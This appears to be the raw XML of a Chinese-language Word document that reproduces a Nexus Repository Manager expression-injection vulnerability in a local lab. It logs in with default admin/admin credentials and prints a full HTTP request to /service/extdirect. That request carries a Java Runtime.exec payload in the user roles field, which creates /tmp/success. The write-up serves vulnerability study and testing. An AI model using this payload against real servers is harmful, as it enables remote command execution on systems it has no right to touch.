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D8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一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1A19" w:rsidRDefault="005B1A19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FE40E6" w:rsidRDefault="00FE40E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0E6" w:rsidRDefault="00FE40E6">
                            <w:r w:rsidRPr="00FE40E6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FE40E6" w:rsidRDefault="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6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0E6" w:rsidRDefault="00FE40E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问8</w:t>
      </w:r>
      <w:r>
        <w:t>081</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口可看到w</w:t>
      </w:r>
      <w:r>
        <w:t>eb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，该漏洞需要访问更新角色或创建角色接口，所以需要使用</w:t>
      </w:r>
      <w:r w:rsidR="00BD21C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号密码a</w:t>
      </w:r>
      <w:r>
        <w:t>dmin/admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录后台</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1A19" w:rsidRDefault="00BD21C8">
      <w:r w:rsidRPr="00BD21C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2891272"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="6" name="图片 6" descr="C:\Users\Toby\AppData\Local\Temp\165371969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719698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0E6" w:rsidRDefault="00FE40E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B1A19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二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1A19" w:rsidRDefault="00FE40E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、登录后台，复制当前</w:t>
      </w:r>
      <w:r>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>CSRF T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>oken，发送如下数据包，成功执行E</w:t>
      </w:r>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE40E6" w:rsidRDefault="00FE40E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63662" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="13335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6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0E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                            <w:r w:rsidRPr="00FE40E6">
                              <w:t>POST /service/extdirect HTTP/1.1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Host: 192.168.1.3:8081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Content-Length: 223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X-Requested-With: XMLHttpRequest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X-Nexus-UI: true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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36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NX-ANTI-CSRF-TOKEN: 0.34435456726224034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Content-Type: application/json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Accept: */*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Origin: http://192.168.1.3:8081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Referer: http://192.168.1.3:8081/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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Cookie: NX-ANTI-CSRF-TOKEN=0.34435456726224034; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                            <w:r w:rsidRPr="00FE40E6">
                              <w:t>Connection: close</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6"/>
                          <w:p w:rsidR="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                            <w:r w:rsidRPr="00FE40E6">
                              <w:t>{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\B{233*233}"]}],"type":"rpc","tid":11}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>POST /service/extdirect HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>Host: 192.168.1.3:8081</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>Content-Length: 223</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>X-Requested-With: XMLHttpRequest</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>X-Nexus-UI: true</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>NX-ANTI-CSRF-TOKEN: 0.34435456726224034</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>Content-Type: application/json</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>Accept: */*</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>Origin: http://192.168.1.3:8081</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>Referer: http://192.168.1.3:8081/</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>Accept-Encoding: gzip, deflate</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>Cookie: NX-ANTI-CSRF-TOKEN=0.34435456726224034; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>Connection: close</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6"/>
                    <w:p w:rsidR="00FE40E6" w:rsidRDefault="00FE40E6" w:rsidP="00FE40E6">
                      <w:r w:rsidRPr="00FE40E6">
                        <w:t>{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\B{233*233}"]}],"type":"rpc","tid":11}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FE40E6" w:rsidRPr="00FE40E6" w:rsidRDefault="00FE40E6"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD21C8" w:rsidRDefault="00BD21C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E174E14" wp14:editId="4CEA9416">
            <wp:extent cx="5274310" cy="3985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0E6" w:rsidRDefault="00FE40E6" w:rsidP="00BD21C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BD21C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、将表达式换为如下命令，用于创建/</w:t>
      </w:r>
      <w:r w:rsidR="00BD21C8">
        <w:t>tmp/success</w:t>
      </w:r>
      <w:r w:rsidR="00BD21C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD21C8" w:rsidRDefault="00BD21C8" w:rsidP="00BD21C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5274310" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="21590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1C8" w:rsidRDefault="00BD21C8">
                            <w:r w:rsidRPr="00BD21C8">
                              <w:t>$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00BD21C8" w:rsidRDefault="00BD21C8">
                      <w:r w:rsidRPr="00BD21C8">
                        <w:t>$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}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21C8" w:rsidRDefault="00BD21C8" w:rsidP="00BD21C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C2D2343" wp14:editId="696243A5">
            <wp:extent cx="5274310" cy="4030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C8" w:rsidRDefault="00BD21C8" w:rsidP="00BD21C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、查看容器，/</w:t>
      </w:r>
      <w:r>
        <w:t>tmp/success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件成功创建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD21C8" w:rsidRPr="00BD21C8" w:rsidRDefault="00BD21C8" w:rsidP="00BD21C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EB87011" wp14:editId="1AC93BFF">
            <wp:extent cx="4000500" cy="428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1C8" w:rsidRPr="00BD2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1BF" w:rsidRDefault="004651BF" w:rsidP="005B1A19">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004651BF" w:rsidRDefault="004651BF" w:rsidP="005B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1BF" w:rsidRDefault="004651BF" w:rsidP="005B1A19">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004651BF" w:rsidRDefault="004651BF" w:rsidP="005B1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1E"/>
    <w:rsid w:val="0000671E"/>
    <w:rsid w:val="000C7CD9"/>
    <w:rsid w:val="00402DD8"/>
    <w:rsid w:val="004651BF"/>
    <w:rsid w:val="005B1A19"/>
    <w:rsid w:val="00BD21C8"/>
    <w:rsid w:val="00FE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AEEFC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AA4A0A42-68BD-495C-B76F-5E5BA1E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2022-05-28T05:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-28T06:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>